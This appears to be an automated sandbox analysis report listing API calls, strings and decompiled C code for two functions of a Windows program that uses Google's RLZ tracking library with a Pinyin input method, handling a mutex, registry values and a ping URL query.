RegCloseKey.ADVAPI32(?,?), ref: 004C3767
RegCloseKey.ADVAPI32(?,?), ref: 004C3779
ReleaseMutex.KERNEL32(00000000,?), ref: 004C377C
RegEnumValueW.ADVAPI32 ref: 004C37AF
RegCloseKey.ADVAPI32(?), ref: 004C3826
RegCloseKey.ADVAPI32(?), ref: 004C3838
ReleaseMutex.KERNEL32(?), ref: 004C383F
CloseHandle.KERNEL32(?), ref: 004C3846

Strings

Events, xrefs: 004C3714
{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}, xrefs: 004C3662
%s\%s\%s, xrefs: 004C371E
Software\Google\Common\Rlz, xrefs: 004C3719

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Mutex$Release$Handle$CreateEnumObjectSingleValueWait
String ID: %s\%s\%s$Events$Software\Google\Common\Rlz${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
API String ID: 499141423-912985715
Opcode ID: 3a4d7eba788c03e757babe54a931b50c2e88402cc54554b93bed1cb501acc306
Instruction ID: df1f3368969b247ec07a1e940d9db436778b25cf35964f8ec4418c6cea851c44
Opcode Fuzzy Hash: 3a4d7eba788c03e757babe54a931b50c2e88402cc54554b93bed1cb501acc306
Instruction Fuzzy Hash: C36112791043409BC350EF28C885E2BBBE8FF99355F14891EF44193361C778E949CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004C5550, Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 439
synchronizationregistryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004C5550(signed int __ecx, signed int __edx, void* __ebp, void* __eflags) {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				char _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				char _v320;
				intOrPtr _v324;
				signed int _v328;
				void* _v332;
				char _v336;
				signed int _v340;
				signed int _v344;
				char _v348;
				void* _v352;
				char _v356;
				char _v360;
				signed int _v364;
				signed int _v368;
				char _v372;
				void* _v376;
				char _v377;
				char _v380;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t147;
				signed int _t149;
				void* _t153;
				signed int _t155;
				void* _t158;
				signed int _t164;
				signed int _t170;
				intOrPtr _t176;
				signed int _t177;
				signed int** _t180;
				signed int** _t182;
				signed int** _t184;
				void* _t185;
				void* _t201;
				signed int** _t204;
				signed int _t205;
				intOrPtr* _t208;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				signed int _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t245;
				signed int _t249;
				signed int** _t254;
				signed int _t260;
				void* _t261;
				signed int _t264;
				signed int _t281;
				signed int _t291;
				intOrPtr _t317;
				intOrPtr _t318;
				signed int _t320;
				signed int _t322;
				intOrPtr _t324;
				signed int _t326;
				signed int _t333;
				void* _t334;
				signed int _t335;
				signed int _t337;
				signed int _t338;
				signed int _t341;
				void* _t342;
				signed int _t343;
				signed int _t344;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				char _t350;
				void* _t353;
				void* _t355;
				signed int _t356;
				signed int _t357;
				void* _t359;
				void* _t360;

				_t360 = __eflags;
				_t316 = __edx;
				_push(0xffffffff);
				_push(0x51af44);
				_push( *[fs:0x0]);
				_t356 = _t355 - 0x174;
				_t147 =  *0x5596fc; // 0x9d48295
				_v16 = _t147 ^ _t356;
				_push(__ebp);
				_t149 =  *0x5596fc; // 0x9d48295
				_push(_t149 ^ _t356);
				 *[fs:0x0] =  &_v12;
				_t341 = 0;
				_t333 = __ecx;
				_t260 = 0;
				_v328 = __ecx;
				_v336 = 0;
				_t353 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
				_push(_t353);
				_v332 = _t353;
				_t153 = L004C5D10(_t316, _t360);
				_t357 = _t356 + 4;
				if(_t153 != 0) {
					_t260 = 0 | WaitForSingleObject(_t353, 0x1388) == 0x00000000;
					_v336 = 0;
				}
				_v4 = _t341;
				if(_t260 == 0) {
					L11:
					CloseHandle(_t353);
					_t155 = 0;
					L74:
					 *[fs:0x0] = _v12;
					_pop(_t334);
					_pop(_t342);
					_pop(_t261);
					return L004EEDC9(_t155, _t261, _v16 ^ _t357, _t316, _t334, _t342);
				}
				_v352 = 0x80000001;
				_v4 = 1;
				if(E004C75E0() != 0) {
					L7:
					_t158 = _v352;
					if(_t158 != 0 && _t158 != 0x80000001) {
						RegCloseKey(_t158);
					}
					ReleaseMutex(_t353);
					goto L11;
				}
				if(E004C76D0(_t260, _t316, _t333, _t341) == 0) {
					L12:
					E004C8730(_t333,  &_v372);
					_push( &_v344);
					_v8 = 2;
					_t343 = _t341 | 0xffffffff;
					_v344 = _t343;
					_t164 = E004C5370(_t333);
					_t357 = _t357 + 4;
					__eflags = _t164;
					if(_t164 != 0) {
						__eflags = _v340;
						if(_v340 != 0) {
							_t317 =  *0x559000; // 0x521840
							_t26 = _t317 + 0xc; // 0x4edeb4
							_v356 =  *((intOrPtr*)( *_t26))() + 0x10;
							_v4 = 3;
							_t318 =  *0x559000; // 0x521840
							_t29 = _t318 + 0xc; // 0x4edeb4
							_t170 =  *((intOrPtr*)( *_t29))() + 0x10;
							__eflags = _t170;
							_v344 = _t170;
							_v4 = 4;
							L004C7EF0( &_v356, L"%s: ", L"events");
							L004C7EF0( &_v344, L"%s: ", L"stateful-events");
							_t359 = _t357 + 0x10;
							_v324 = L004C78C0(L"rlz");
							while(1) {
								_t344 = _t343 + 1;
								__eflags = _t344;
								_t279 = _v372;
								_t176 =  *((intOrPtr*)(_v372 - 0xc));
								if(_t344 < 0) {
									goto L22;
								}
								__eflags = _t344 - _t176;
								if(_t344 > _t176) {
									goto L22;
								}
								_t249 = E004C8190(_t279 + _t344 * 2, "\n");
								__eflags = _t249;
								if(_t249 == 0) {
									goto L22;
								}
								_v364 = _t249 - _v372 >> 1;
								L23:
								_t335 = _v364;
								__eflags = _t335;
								if(_t335 < 0) {
									_t335 = _v340;
								}
								__eflags = _t335 - _t344;
								if(_t335 <= _t344) {
									L58:
									__eflags = _v364;
									if(_v364 < 0) {
										goto L61;
									}
									_t343 = _v364;
									continue;
								} else {
									_t324 =  *0x559000; // 0x521840
									_t44 = _t324 + 0xc; // 0x4edeb4
									_v376 =  *((intOrPtr*)( *_t44))() + 0x10;
									_t291 = _t344;
									_v4 = 5;
									_t201 = L00413A70(_t335 - _t344, _t291,  &_v320,  &_v372);
									_v8 = 6;
									L00410C10(_t201,  &_v380);
									_v8 = 5;
									_t204 = _v324 + 0xfffffff0;
									_t326 =  &(_t204[3]);
									asm("lock xadd [edx], ecx");
									__eflags = (_t291 | 0xffffffff) - 1;
									if((_t291 | 0xffffffff) - 1 <= 0) {
										_t326 =  *( *_t204);
										 *((intOrPtr*)( *((intOrPtr*)(_t326 + 4))))(_t204);
									}
									_t353 = _v376;
									_t345 = _t353;
									_t205 = E004C77A0(_t353, _t353);
									__eflags = _t205;
									if(_t205 == 0) {
										__eflags = E004C77A0(_t345, _t353);
										if(__eflags == 0) {
											__eflags = E004C77A0(_t345, _t353);
											if(__eflags == 0) {
												goto L55;
											}
											_t337 = 0;
											_v296 = 0;
											_v292 = 0;
											_v288 = 0;
											_v284 = 0;
											_push( &_v296);
											_t326 =  &_v376;
											_v4 = 0xb;
											L004C3AB0(_t326, __eflags,  &_v344);
											_t346 = _v292;
											_t264 = _v296;
											_t359 = _t359 + 8;
											__eflags = _t346;
											if(_t346 <= 0) {
												L53:
												__eflags = _t264;
												if(_t264 != 0) {
													E004EF421(_t264);
													_t359 = _t359 + 4;
												}
												goto L55;
											}
											__eflags = 0 - _t346;
											if(__eflags >= 0) {
												L60:
												E00401050(_t264, _t326, 0x80070057);
												L61:
												_t281 = _v328;
												_t319 =  &_v377;
												_v377 = 0;
												_t177 = L004C69C0(_t281,  &_v377, _t353,  &_v280);
												_t357 = _t359 + 4;
												__eflags = _t177;
												if(__eflags != 0) {
													__eflags = _v377;
													if(__eflags != 0) {
														_t281 =  &_v280;
														E004C65A0(_t281,  &_v377, __eflags);
													}
												}
												E004C33F0(_t319, __eflags);
												_v4 = 3;
												_t180 = _v344 + 0xfffffff0;
												_t320 =  &(_t180[3]);
												asm("lock xadd [edx], ecx");
												__eflags = (_t281 | 0xffffffff) - 1;
												if((_t281 | 0xffffffff) - 1 <= 0) {
													_t320 =  *( *_t180);
													 *((intOrPtr*)( *((intOrPtr*)(_t320 + 4))))(_t180);
												}
												_v4 = 2;
												_t182 = _v356 + 0xfffffff0;
												asm("lock xadd [ecx], edx");
												_t322 = (_t320 | 0xffffffff) - 1;
												__eflags = _t322;
												if(_t322 <= 0) {
													_t322 =  *( *_t182);
													 *((intOrPtr*)( *((intOrPtr*)(_t322 + 4))))(_t182);
												}
												_v4 = 1;
												_t184 = _v372 + 0xfffffff0;
												asm("lock xadd [ecx], edx");
												_t316 = (_t322 | 0xffffffff) - 1;
												__eflags = (_t322 | 0xffffffff) - 1;
												if((_t322 | 0xffffffff) - 1 <= 0) {
													_t316 =  *( *_t184);
													 *((intOrPtr*)( *((intOrPtr*)( *( *_t184) + 4))))(_t184);
												}
												L70:
												_t185 = _v352;
												__eflags = _t185;
												if(_t185 != 0) {
													__eflags = _t185 - 0x80000001;
													if(_t185 != 0x80000001) {
														RegCloseKey(_t185);
													}
												}
												ReleaseMutex(_t353);
												CloseHandle(_t353);
												_t155 = 1;
												goto L74;
											} else {
												goto L52;
											}
											do {
												L52:
												_t326 =  *(_t264 + 4 + _t337 * 8);
												_push(_t326);
												L004C3DC0(_t326, __eflags,  *((intOrPtr*)(_t264 + _t337 * 8)));
												_t337 = _t337 + 1;
												_t359 = _t359 + 8;
												__eflags = _t337 - _t346;
											} while (__eflags < 0);
											goto L53;
										}
										_t338 = 0;
										_v312 = 0;
										_v308 = 0;
										_v304 = 0;
										_v300 = 0;
										_push( &_v312);
										_t326 =  &_v376;
										_v4 = 0xa;
										L004C3AB0(_t326, __eflags,  &_v356);
										_t347 = _v308;
										_t264 = _v312;
										_t359 = _t359 + 8;
										__eflags = _t347;
										if(_t347 <= 0) {
											goto L53;
										}
										__eflags = 0 - _t347;
										if(__eflags >= 0) {
											goto L60;
										} else {
											goto L47;
										}
										do {
											L47:
											_t326 =  *(_t264 + _t338 * 8);
											_push( *((intOrPtr*)(_t264 + 4 + _t338 * 8)));
											E004C43F0(_t326, __eflags, _t326);
											_t338 = _t338 + 1;
											_t359 = _t359 + 8;
											__eflags = _t338 - _t347;
										} while (__eflags < 0);
										goto L53;
									} else {
										__eflags = _v12;
										if(_v12 < 0) {
											L55:
											_t208 =  &_v16;
											_v4 = 4;
											asm("lock xadd [ecx], edx");
											__eflags = (_t326 | 0xffffffff) - 1;
											if((_t326 | 0xffffffff) - 1 <= 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t208)) + 4))))(_t208);
											}
											L57:
											_t353 = _v332;
											goto L58;
										}
										_t221 = E004C8190(_t353, L": ");
										__eflags = _t221;
										if(_t221 == 0) {
											goto L55;
										}
										_t222 = _t221 - _t353;
										__eflags = _t222;
										_t223 = _t222 >> 1;
										_t348 = _t222 >> 1;
										if(_t222 < 0) {
											goto L55;
										}
										_t331 =  &_v348;
										L00413A70(_t223 - _v324, 3,  &_v348,  &_v376);
										_v8 = 7;
										_v372 = 0;
										_t226 = E004C60D0( &_v372);
										__eflags = _t226;
										if(_t226 == 0) {
											L39:
											L004C8A50( &_v348, _t331);
											_v4 = 4;
											L004C8A50( &_v376, _t331);
											goto L57;
										}
										__eflags = _v368;
										if(_v368 == 0) {
											goto L39;
										}
										_t331 =  &_v376;
										L004C7D60(_v12 - _t348 - 2,  &_v360,  &_v376);
										_push( &_v364);
										_v8 = 8;
										L004C7C80(0x5333cc);
										_t349 = _v368;
										_t236 = E004C8130(_t349, L"\r\n ");
										__eflags = _t236;
										if(_t236 == 0) {
											L36:
											_t237 =  *(_t349 - 0xc);
											L37:
											__eflags = _t237 - 0x40;
											if(_t237 <= 0x40) {
												_t350 = _v372;
												__eflags = _t350 - 0x44;
												if(_t350 > 0x44) {
													L42:
													_t326 =  &_v364;
													_t238 = L00413A00(_t237, _t326);
													_v8 = 9;
													L004C4D90(_t326, __eflags, _t350,  *_t238);
													_t359 = _t359 + 8;
													L004C8A50( &_v320, _t326);
													L43:
													L004C8A50( &_v364, _t326);
													L004C8A50( &_v352, _t326);
													goto L55;
												}
												_t77 = _t350 + 0x4c5b44; // 0x1010100
												switch( *((intOrPtr*)(( *_t77 & 0x000000ff) * 4 +  &M004C5B3C))) {
													case 0:
														goto L43;
													case 1:
														goto L42;
												}
											}
											L004C8A50( &_v364, _t331);
											goto L39;
										}
										_t245 = _t236 - _t349;
										__eflags = _t245;
										_t237 = _t245 >> 1;
										if(_t245 >= 0) {
											goto L37;
										}
										goto L36;
									}
								}
								L22:
								_v364 = 0xffffffff;
								goto L23;
							}
						}
						L004C8A50( &_v372, _t316);
						goto L70;
					} else {
						_v4 = 1;
						_t254 = _v372 + 0xfffffff0;
						_t316 =  &(_t254[3]);
						asm("lock xadd [edx], esi");
						__eflags = _t343 - 1;
						if(_t343 - 1 <= 0) {
							_t316 =  *( *_t254);
							 *((intOrPtr*)( *((intOrPtr*)( *( *_t254) + 4))))(_t254);
						}
						goto L7;
					}
				}
				_v368 = _t341;
				_t341 =  &_v368;
				if(E004C7590(_t260, _t333, _t341) < 0 || _v368 <= 1) {
					goto L7;
				} else {
					goto L12;
				}
			}

0x004c5550
0x004c5550
0x004c5550
0x004c5552
0x004c555d
0x004c555e
0x004c5564
0x004c556b
0x004c5573
0x004c5576
0x004c557d
0x004c5585
0x004c5590
0x004c5593
0x004c5595
0x004c5598
0x004c559c
0x004c55a6
0x004c55a8
0x004c55a9
0x004c55ad
0x004c55b2
0x004c55b7
0x004c55c7
0x004c55ca
0x004c55ca
0x004c55ce
0x004c55d7
0x004c5630
0x004c5631
0x004c5637
0x004c5b13
0x004c5b1a
0x004c5b22
0x004c5b23
0x004c5b25
0x004c5b3a
0x004c5b3a
0x004c55d9
0x004c55e1
0x004c55f0
0x004c5613
0x004c5613
0x004c5619
0x004c5623
0x004c5623
0x004c562a
0x00000000
0x004c562a
0x004c55f9
0x004c563e
0x004c5645
0x004c564e
0x004c564f
0x004c5657
0x004c565c
0x004c5660
0x004c5665
0x004c5668
0x004c566a
0x004c5693
0x004c5698
0x004c56a8
0x004c56ae
0x004c56bb
0x004c56bf
0x004c56c7
0x004c56cd
0x004c56d7
0x004c56d7
0x004c56da
0x004c56ec
0x004c56f4
0x004c5707
0x004c570c
0x004c5719
0x004c5720
0x004c5720
0x004c5720
0x004c5721
0x004c5725
0x004c5728
0x00000000
0x00000000
0x004c572a
0x004c572c
0x00000000
0x00000000
0x004c5736
0x004c573b
0x004c573d
0x00000000
0x00000000
0x004c5745
0x004c5753
0x004c5753
0x004c5757
0x004c5759
0x004c575b
0x004c575b
0x004c575f
0x004c5761
0x004c5a28
0x004c5a28
0x004c5a2d
0x00000000
0x00000000
0x004c5a2f
0x00000000
0x004c5767
0x004c5767
0x004c576d
0x004c577a
0x004c5789
0x004c578f
0x004c5796
0x004c579f
0x004c57a7
0x004c57ac
0x004c57b7
0x004c57ba
0x004c57c0
0x004c57c5
0x004c57c7
0x004c57cb
0x004c57d1
0x004c57d1
0x004c57d3
0x004c57dc
0x004c57de
0x004c57e3
0x004c57e5
0x004c592c
0x004c592e
0x004c5999
0x004c599b
0x00000000
0x00000000
0x004c599d
0x004c599f
0x004c59a3
0x004c59a7
0x004c59ab
0x004c59b3
0x004c59b9
0x004c59bd
0x004c59c5
0x004c59ca
0x004c59ce
0x004c59d2
0x004c59d5
0x004c59d7
0x004c59f3
0x004c59f3
0x004c59f5
0x004c59f8
0x004c59fd
0x004c59fd
0x00000000
0x004c59f5
0x004c59d9
0x004c59db
0x004c5a38
0x004c5a3d
0x004c5a42
0x004c5a47
0x004c5a4b
0x004c5a4f
0x004c5a54
0x004c5a59
0x004c5a5c
0x004c5a5e
0x004c5a60
0x004c5a65
0x004c5a67
0x004c5a6b
0x004c5a6b
0x004c5a65
0x004c5a70
0x004c5a75
0x004c5a81
0x004c5a84
0x004c5a8a
0x004c5a8f
0x004c5a91
0x004c5a95
0x004c5a9b
0x004c5a9b
0x004c5a9d
0x004c5aa9
0x004c5ab2
0x004c5ab6
0x004c5ab7
0x004c5ab9
0x004c5abd
0x004c5ac3
0x004c5ac3
0x004c5ac5
0x004c5ad1
0x004c5ada
0x004c5ade
0x004c5adf
0x004c5ae1
0x004c5ae5
0x004c5aeb
0x004c5aeb
0x004c5aed
0x004c5aed
0x004c5af1
0x004c5af3
0x004c5af5
0x004c5afa
0x004c5afd
0x004c5afd
0x004c5afa
0x004c5b04
0x004c5b0b
0x004c5b11
0x00000000
0x00000000
0x00000000
0x00000000
0x004c59dd
0x004c59dd
0x004c59dd
0x004c59e4
0x004c59e6
0x004c59eb
0x004c59ec
0x004c59ef
0x004c59ef
0x00000000
0x004c59dd
0x004c5930
0x004c5932
0x004c5936
0x004c593a
0x004c593e
0x004c5946
0x004c594c
0x004c5950
0x004c5958
0x004c595d
0x004c5961
0x004c5965
0x004c5968
0x004c596a
0x00000000
0x00000000
0x004c5970
0x004c5972
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5978
0x004c5978
0x004c597c
0x004c597f
0x004c5981
0x004c5986
0x004c5987
0x004c598a
0x004c598a
0x00000000
0x004c57eb
0x004c57eb
0x004c57ef
0x004c5a00
0x004c5a00
0x004c5a09
0x004c5a11
0x004c5a16
0x004c5a18
0x004c5a22
0x004c5a22
0x004c5a24
0x004c5a24
0x00000000
0x004c5a24
0x004c57fc
0x004c5801
0x004c5803
0x00000000
0x00000000
0x004c5809
0x004c5809
0x004c580b
0x004c580d
0x004c580f
0x00000000
0x00000000
0x004c5823
0x004c5827
0x004c582c
0x004c583c
0x004c5844
0x004c5849
0x004c584b
0x004c58ac
0x004c58b0
0x004c58b9
0x004c58c1
0x00000000
0x004c58c1
0x004c584d
0x004c5852
0x00000000
0x00000000
0x004c5859
0x004c5865
0x004c586e
0x004c5874
0x004c587c
0x004c5881
0x004c588c
0x004c5891
0x004c5893
0x004c589b
0x004c589b
0x004c589e
0x004c589e
0x004c58a1
0x004c58cb
0x004c58cf
0x004c58d2
0x004c58e2
0x004c58e6
0x004c58ea
0x004c58ef
0x004c58fb
0x004c5900
0x004c5907
0x004c590c
0x004c5910
0x004c5919
0x00000000
0x004c5919
0x004c58d4
0x004c58db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004c58db
0x004c58a7
0x00000000
0x004c58a7
0x004c5895
0x004c5895
0x004c5897
0x004c5899
0x00000000
0x00000000
0x00000000
0x004c5899
0x004c57e5
0x004c574b
0x004c574b
0x00000000
0x004c574b
0x004c5720
0x004c569e
0x00000000
0x004c566c
0x004c566c
0x004c5678
0x004c567b
0x004c567e
0x004c5683
0x004c5685
0x004c5689
0x004c568f
0x004c568f
0x00000000
0x004c5685
0x004c566a
0x004c55fb
0x004c55ff
0x004c560a
0x00000000
0x00000000
0x00000000
0x00000000

APIs

CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,?,?,?,00000001), ref: 004C55A0
WaitForSingleObject.KERNEL32(00000000,00001388,00000001), ref: 004C55BF
RegCloseKey.ADVAPI32(80000001), ref: 004C5623
ReleaseMutex.KERNEL32(00000000), ref: 004C562A
CloseHandle.KERNEL32(00000000,00000001), ref: 004C5631
_free.LIBCMT ref: 004C59F8
RegCloseKey.ADVAPI32(?), ref: 004C5AFD
ReleaseMutex.KERNEL32(00000000), ref: 004C5B04
CloseHandle.KERNEL32(00000000), ref: 004C5B0B

Strings

%s: , xrefs: 004C56E3, 004C56FE
, xrefs: 004C5885
stateful-events, xrefs: 004C56F9
4QS, xrefs: 004C5731
rlz, xrefs: 004C570F, 004C57D7
{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}, xrefs: 004C558B
events, xrefs: 004C56DE

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Mutex$HandleRelease$CreateObjectSingleWait_free
String ID: $%s: $4QS$events$rlz$stateful-events${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
API String ID: 1472798645-827787425
Opcode ID: fcc368407e85c1ad4a8d2dc0959a52f71530f38a09482c0b2e39c8e0e3170e98
Instruction ID: dad3d65853d57aff4d5e984dbcbc968e28b96125280c55577d750db3e7c31097
Opcode Fuzzy Hash: fcc368407e85c1ad4a8d2dc0959a52f71530f38a09482c0b2e39c8e0e3170e98
Instruction Fuzzy Hash: E502EE381087408FD390DB29C881F5FB7E4BFC4314F444A1EF99A87292DB79A985CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004C26B0, Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 217
synchronizationregistryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004C26B0(void* __ecx, void* __edx, void* __ebp, char _a4, void* _a8, char _a12, short _a284, char _a420, signed int _a4524, char _a4532, struct _SECURITY_ATTRIBUTES* _a4540, void* _a4548) {
				void* _v0;
				void* _v4;
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t60;
				short _t63;
				void* _t67;
				void* _t76;
				void* _t77;
				void* _t78;
				intOrPtr* _t81;
				void* _t82;
				void* _t93;
				void* _t105;
				void* _t110;
				signed int _t111;
				void* _t112;
				char* _t120;
				void* _t133;
				void* _t134;
				signed int _t135;
				void* _t139;
				void* _t140;
				struct _SECURITY_ATTRIBUTES* _t142;
				intOrPtr _t143;
				void* _t144;
				void* _t147;
				signed int _t149;
				void* _t151;

				_t126 = __edx;
				_push(0xffffffff);
				_push(0x5175fc);
				_push( *[fs:0x0]);
				L00504AA0(0x11c0);
				_t58 =  *0x5596fc; // 0x9d48295
				_a4524 = _t58 ^ _t149;
				_push(__ebp);
				_t60 =  *0x5596fc; // 0x9d48295
				_push(_t60 ^ _t149);
				 *[fs:0x0] =  &_a4532;
				_t147 = _a4548;
				_t133 = __ecx;
				_v0 = __edx;
				_t152 = __edx;
				if(__edx == 0) {
					L10:
					_t63 = 0;
					L39:
					 *[fs:0x0] = _a4532;
					_pop(_t134);
					_pop(_t139);
					_pop(_t110);
					return L004EEDC9(_t63, _t110, _a4524 ^ _t149, _t126, _t134, _t139);
				}
				E00411150(__edx);
				_t111 = 0;
				_a4 = 0;
				_t140 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
				_push(_t140);
				_a8 = _t140;
				_t67 = L004C5D10(_t126, _t152);
				_t149 = _t149 + 4;
				if(_t67 != 0) {
					_t111 = 0 | WaitForSingleObject(_t140, 0x1388) == 0x00000000;
					_a4 = 0;
				}
				_a4540 = 0;
				if(_t111 == 0) {
					L9:
					CloseHandle(_t140);
					goto L10;
				}
				_v4 = 0x80000001;
				_a4540 = 1;
				if(E004C75E0() == 0) {
					L0040CC20( &_v12);
					_push(L"pinyin");
					_a4540 = 2;
					L004C7EF0( &_v12, L"%s=%s", 0x533220);
					_t151 = _t149 + 0xc;
					__eflags = _t133;
					if(_t133 != 0) {
						_push(_t133);
						L004C8A40( &_v12, L"&%s=%s", L"brand");
						_t151 = _t151 + 0xc;
					}
					__eflags = _t147;
					if(_t147 != 0) {
						_push(_t147);
						L004C8A40( &_v12, L"&%s=%s", L"hl");
						_t151 = _t151 + 0xc;
					}
					_a420 = 0;
					_t112 = L004C4A00( &_a420);
					__eflags = _t112;
					if(_t112 == 0) {
						_t135 = 0;
						__eflags = 0;
						_t21 = _t135 + 1; // 0x1
						_t142 = _t21;
						do {
							_a284 = 0;
							_t76 = L004C4B10(_t142, __eflags,  &_a284);
							_t151 = _t151 + 4;
							__eflags = _t76;
							if(_t76 != 0) {
								__eflags = _a284;
								if(_a284 != 0) {
									 *(_t151 + 0x2c + _t135 * 4) = _t142;
									_t135 = _t135 + 1;
									__eflags = _t135;
								}
							}
							_t142 =  &(_t142->nLength);
							__eflags = _t142 - 0x44;
						} while (__eflags < 0);
						 *(_t151 + 0x2c + _t135 * 4) = 0;
						goto L23;
					} else {
						L004C8A40( &_v12, L"&%s",  &_a420);
						_t151 = _t151 + 8;
						L23:
						_a420 = 0;
						_t120 = 0x55b204;
						__eflags = _t112;
						if(__eflags == 0) {
							_t120 =  &_a12;
						}
						_t129 =  &_a420;
						_t77 = E004C5030(_t120,  &_a420, __eflags);
						__eflags = _t77;
						if(_t77 != 0) {
							_t129 =  &_a420;
							L004C8A40( &_v12, L"&%s",  &_a420);
							_t151 = _t151 + 8;
						}
						__eflags = _t112;
						if(_t112 != 0) {
							L0040CC20( &_v8);
							_a4540 = 3;
							_t93 = E004C7010(_t129, _t147,  &_v8);
							_t151 = _t151 + 4;
							__eflags = _t93;
							if(_t93 != 0) {
								_push(_v8);
								L004C8A40( &_v12, L"&%s=%s", 0x533228);
								_t151 = _t151 + 0xc;
							}
							_a4540 = 2;
							L004C8A50( &_v8, _t129);
						}
						_a420 = 0;
						_t78 = E004C3160(0,  &_a420, _t147);
						__eflags = _t78;
						if(_t78 != 0) {
							L004C8A40( &_v12, L"&%s",  &_a420);
							_t151 = _t151 + 8;
						}
						_t143 = _v12;
						_push(_t143);
						L004C7EF0(_v0, L"%s?%s", L"/tools/pso/ping");
						_t81 = _t143 - 0x10;
						_t149 = _t151 + 0xc;
						_a4540 = 1;
						asm("lock xadd [ecx], edx");
						_t126 = 0xfffffffffffffffe;
						__eflags = 0xfffffffffffffffe;
						if(0xfffffffffffffffe <= 0) {
							_t126 =  *((intOrPtr*)( *_t81));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t81)) + 4))))(_t81);
						}
						_t82 = _v4;
						__eflags = _t82;
						if(_t82 != 0) {
							__eflags = _t82 - 0x80000001;
							if(_t82 != 0x80000001) {
								RegCloseKey(_t82);
							}
						}
						_t144 = _a8;
						ReleaseMutex(_t144);
						CloseHandle(_t144);
						_t63 = 1;
						goto L39;
					}
				}
				_t105 = _v4;
				if(_t105 != 0 && _t105 != 0x80000001) {
					RegCloseKey(_t105);
				}
				ReleaseMutex(_t140);
				goto L9;
			}

0x004c26b0
0x004c26b0
0x004c26b2
0x004c26bd
0x004c26c3
0x004c26c8
0x004c26cf
0x004c26d7
0x004c26da
0x004c26e1
0x004c26e9
0x004c26ef
0x004c26f8
0x004c26fa
0x004c26fe
0x004c2700
0x004c2794
0x004c2794
0x004c299a
0x004c29a1
0x004c29a9
0x004c29aa
0x004c29ac
0x004c29c1
0x004c29c1
0x004c2706
0x004c2712
0x004c2716
0x004c2720
0x004c2722
0x004c2723
0x004c2727
0x004c272c
0x004c2731
0x004c2741
0x004c2744
0x004c2744
0x004c2748
0x004c2755
0x004c278d
0x004c278e
0x00000000
0x004c278e
0x004c2757
0x004c275f
0x004c276e
0x004c279f
0x004c27a4
0x004c27b5
0x004c27bd
0x004c27c2
0x004c27c5
0x004c27c7
0x004c27c9
0x004c27d6
0x004c27db
0x004c27db
0x004c27de
0x004c27e0
0x004c27e2
0x004c27f1
0x004c27f6
0x004c27f6
0x004c2802
0x004c280f
0x004c2811
0x004c2813
0x004c2830
0x004c2830
0x004c2832
0x004c2832
0x004c2835
0x004c283e
0x004c2849
0x004c284e
0x004c2851
0x004c2853
0x004c2855
0x004c285e
0x004c2860
0x004c2864
0x004c2864
0x004c2864
0x004c285e
0x004c2865
0x004c2866
0x004c2866
0x004c286b
0x00000000
0x004c2815
0x004c2826
0x004c282b
0x004c2873
0x004c2875
0x004c287d
0x004c2882
0x004c2884
0x004c2886
0x004c2886
0x004c288a
0x004c2891
0x004c2896
0x004c2898
0x004c289a
0x004c28ab
0x004c28b0
0x004c28b0
0x004c28b3
0x004c28b5
0x004c28bb
0x004c28c3
0x004c28cb
0x004c28d0
0x004c28d3
0x004c28d5
0x004c28db
0x004c28ea
0x004c28ef
0x004c28ef
0x004c28f6
0x004c28fe
0x004c28fe
0x004c290c
0x004c2914
0x004c2919
0x004c291b
0x004c2929
0x004c292e
0x004c292e
0x004c2931
0x004c2939
0x004c2944
0x004c2949
0x004c294c
0x004c294f
0x004c295d
0x004c2961
0x004c2962
0x004c2964
0x004c2968
0x004c296e
0x004c296e
0x004c2970
0x004c2974
0x004c2976
0x004c2978
0x004c297d
0x004c2980
